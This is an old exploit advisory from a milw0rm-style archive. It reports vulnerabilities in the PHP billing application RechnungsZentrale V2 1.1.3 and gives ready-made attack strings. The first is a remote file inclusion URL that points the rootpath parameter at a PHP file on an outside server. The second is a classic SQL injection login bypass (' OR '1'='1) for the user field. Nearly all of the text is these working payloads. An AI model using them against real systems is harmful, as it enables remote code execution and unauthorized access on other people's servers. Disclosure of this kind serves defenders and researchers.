- GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion: http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 SQL Injection: User: ' OR '1'='1 Password: 1 - Bugs discovered by GroundZero Security Research and Software Development - - http://www.GroundZero-Security.com | Http://www.g-0.org - # milw0rm.com [2006-04-19]